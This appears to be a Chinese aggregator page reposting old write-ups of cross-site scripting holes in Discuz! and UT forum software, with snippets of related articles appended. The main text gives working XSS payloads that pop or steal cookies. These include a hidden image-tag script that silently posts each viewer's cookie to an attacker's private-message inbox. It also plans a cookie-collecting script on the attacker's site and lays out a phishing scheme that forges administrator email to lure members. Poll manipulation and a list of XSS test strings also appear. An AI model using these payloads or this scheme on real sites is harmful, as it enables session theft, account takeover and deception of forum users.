Discuz!跨站大全

在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。
例如
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22

效果是首先弹出自己的cookie
利用方法:把上述代码放置到img中。

适用版本:discuz!2.x
discuz!3.x
一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试

通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下:
XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan)
http://XXX/pm.php?action=send&username=XXXFan

因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script><b%20"

上面的链接点击以后首先弹出的是自己的cookie内容。
当然我们可以先在自己的站点上构造一个程序来收集cookie,类似于
getcookie.php?cookie=

但是如何来诱使会员点击呢,如果简单的放在论坛上,太容易被识别。所以可以利用discuz论坛程序的另外一个功能,“帖子介绍给朋友”功能。

因为discuz的这个功能对填写的emial地址没有进行任何过滤、辨别和模版,可以伪造任何人给别人发信,安全性很高。利用这个功能我们就可以伪造ExploitFan的管理员给某个会员发一封信,诱使会员点击我们准备的URL,如果诱使就看自己的手段了,例如可以说“论坛正在测试新功能,请您协助点击上面地址,我们会在后台记录您的点击在合适的时间会给您增加积分以做奖励”等等。

因为链接地址是XXXFan的,而且发信人和邮件地址都是XXXFan的官方地址,所以可信度非常高,而且不会留下任何把柄。当然为了更高的安全性,可以在<script>里的内容加密,以进一步增加隐蔽性。

至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码

本方法适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用方法请参与在我以前发表的discuz!悄悄话漏洞
【BUG】Discuz!投票的BUG
投票可以用
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n
(n为选项,从0开始)
的方式通过URL来直接投票

但是如果n>最大选项呢,嘻嘻~
照样提交成功,不过增加了一个标题为空的选项

效果见:
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc
(那个最后的空白的是我刚加的)

该漏洞存在的版本:
Discuz!3.X
Discuz!2.X(可能,没有测试过)
Discuz!的代码漏洞
这是接着昨天发现的漏洞所展开的,第一发现者(PK0909)。

具体的描述就不说了,下面是一个简单的测试代码。

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E

上面的代码是显示出自己的cookie

下面是在某个比较有名的论坛的测试代码,无论谁察看该网页都会把cookie送到指定的会员短信箱里,隐蔽性很好,就是如果有人引用你的贴,哈哈~这里都会跑出来,露馅了

[ img]xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]
发现discuz!UT 跨域站点的脚本漏洞--短消息篇有关跨域站点的脚本漏洞,已经算是非常平成并普遍的漏洞了。
有关具体的消息可以参阅:
http://www.cert.org/advisories/CA-2000-02.html
下面针对Discuz、UT论坛程序的悄悄话部分加以说明

漏洞适应版本:
Discuz1.X
Discuz!2.0(0609,0820版)
Discuz!3.X
UT 1.0

漏洞描述:

discuz!给指定会员发送悄悄话使用的是类似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的语句,但是name没有经过过滤直接显示在发送短消息的页面中,这就给偷cookie或者更严重的破坏打开了方便之门。

Discuz!3.X已经改为http://XXX.net/pm.php?action=send&uid=XXXX类似的语句,避免了这个漏洞,但是在选择短信文件夹的时候却没有经过过滤。同样产生了上面的漏洞


http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie)%3C/script%3E%3Cb%22[/url]
,上面的例子是显示自己的cookie。(针对Discuz!1.X Discuz!2.X)

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22
显示自己的cookie。(针对Discuz!3.X)

UT虽然在主题上经过了过滤,也就是说把%27转换为';但是其收件人却没有过滤,所以同样有类似的漏洞。例子略。(在不同的UT论坛上发现其代码不尽相同,但是总的来说都有类似的漏洞)

危害度:中弱

预防办法:
点击超级链接时请注意其真实内容。更多的安全补丁请密切关注官方论坛。

时间: 2024-11-18 07:38:56

Discuz!跨站大全的相关文章

PHP著名开源论坛:Discuz!跨站大全_漏洞研究

在discuz!的发贴.回贴.PM等中的subject都没有经过过滤,所以也可以添加代码.   例如   http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22   效果是首先弹出自己的cookie   利用方法:把上述代码放置到img中.   适用版本:discuz!2.x   discuz!3.x   一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试   通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描

PHP和XSS跨站攻击

攻击 其实这个话题很早就想说说了发现国内不少PHP站点都有XSS漏洞.今天偶然看到PHP5的一个XSS漏洞在此小结一下.顺便提醒使用PHP5的朋友最好打下补丁或者升级一下. 如果你不懂什么是XSS可以看这里或者这里中文的也许会好懂一些. 国内不少论坛都存在跨站脚本漏洞例如这里  有一个Google Hack+XSS的攻击例子针对的是Discuz 4.0.0RC3.国外也很多这样的例子甚至Google也出现过不过在12月初时修正了.跨站攻击很容易就可以构造而且非常隐蔽不易被查觉通常盗取信息后马上跳

XSS跨站测试代码大放送

'><script>alert(document.cookie)</script> ='><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> %3Cscript%3Ealert('XSS')%3C/script%3E <

PHP和XSS跨站攻击的防范_php技巧

其实这个话题很早就想说说了发现国内不少PHP站点都有XSS漏洞.今天偶然看到PHP5的一个XSS漏洞在此小结一下.顺便提醒使用PHP5的朋友最好打下补丁或者升级一下. 如果你不懂什么是XSS可以看这里或者这里中文的也许会好懂一些. 国内不少论坛都存在跨站脚本漏洞例如这里  有一个Google Hack+XSS的攻击例子针对的是Discuz 4.0.0RC3.国外也很多这样的例子甚至Google也出现过不过在12月初时修正了.跨站攻击很容易就可以构造而且非常隐蔽不易被查觉通常盗取信息后马上跳转回原

php配置防跨站、防跨目录安全

  现在很多网站都是采用php建站,不少都是直接使用现在成熟的cms程序,这些php开发的cms系统本身安全性可能并不高,这时就需要我们在服务器做一些针对php程序配置防跨站.防跨目录等一些设置,可以有效的防止服务器上所有的php网站被恶意篡改. 适用范围及演示系统 适用范围:php5.3及以上版本 演示系统:centos 防跨站.防跨目录安全设置方法 第1步:登录到linux系统终端. 第2步:找到并打开php配置文件. 第3步:在php.ini最底部添加以下代码,并保存.大家可就按以下代码改

温柔的杀手——跨站ASP Script攻击

攻击 每当我们想到黑客的时候,黑客往往是这样一幅画像:一个孤独的人,悄悄进入别人的服务器中,进行破坏或者窃取别人的秘密资料.也许他会更改我们的主页,甚者会窃取客户的信用卡号和密码.另外,黑客还会攻击访问我们网站的客户.与此同时,我们的服务器也成了他的帮凶.微软称这种攻击为"跨站script"攻击.而这种攻击大多数都发生在网站动态产生网页的时侯,但黑客的目标并不是你的网站,而是浏览网站的客户. 跨站script攻击的说明 在一本名为<<ADVISORY CA--2000-02

跨站Script攻击和防范-ASP漏洞集

攻击   跨站Script攻击和防范   第一部分:跨站Script攻击   每当我们想到黑客的时候,黑客往往是这样一幅画像:一个孤独的人,悄悄进入别人的服务器中,进行破坏或者窃取别人的秘密资料.也许他会更改我们的主页,甚者会窃取客户的信用卡号和密码.另外,黑客还会攻击访问我们网站的客户.与此同时,我们的服务器也成了他的帮凶.微软称这种攻击为"跨站script"攻击.而这种攻击大多数都发生在网站动态产生网页的时侯,但黑客的目标并不是你的网站,而是浏览网站的客户.   跨站script攻

跨站Script攻击和防范-ASP漏洞集(续)

攻击   跨站Script攻击和防范   第一部分:跨站Script攻击   每当我们想到黑客的时候,黑客往往是这样一幅画像:一个孤独的人,悄悄进入别人的服务器中,进行破坏或者窃取别人的秘密资料.也许他会更改我们的主页,甚者会窃   取客户的信用卡号和密码.另外,黑客还会攻击访问我们网站的客户.与此同时,我们的服务器也成了他的帮凶.微软称这种攻击为"跨站script"攻击.而这种攻击大多   数都发生在网站动态产生网页的时侯,但黑客的目标并不是你的网站,而是浏览网站的客户.   跨站s

防止伪造跨站请求的小招式

伪造跨站请求介绍 伪造跨站请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等.这种攻击常见的表现形式有: 伪造链接,引诱用户点击,或是让用户在不知情的情况下访问 伪造表单,引诱用户提交.表单可以是隐藏的,用图片或链接的形式伪装. 比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变换频繁的字符串,然后在处理表单的时候对这个字符串进行检查.这个随机字符串如果和当前用户身份相关联的话,那么攻击者伪造请求会比较麻烦. yahoo对付伪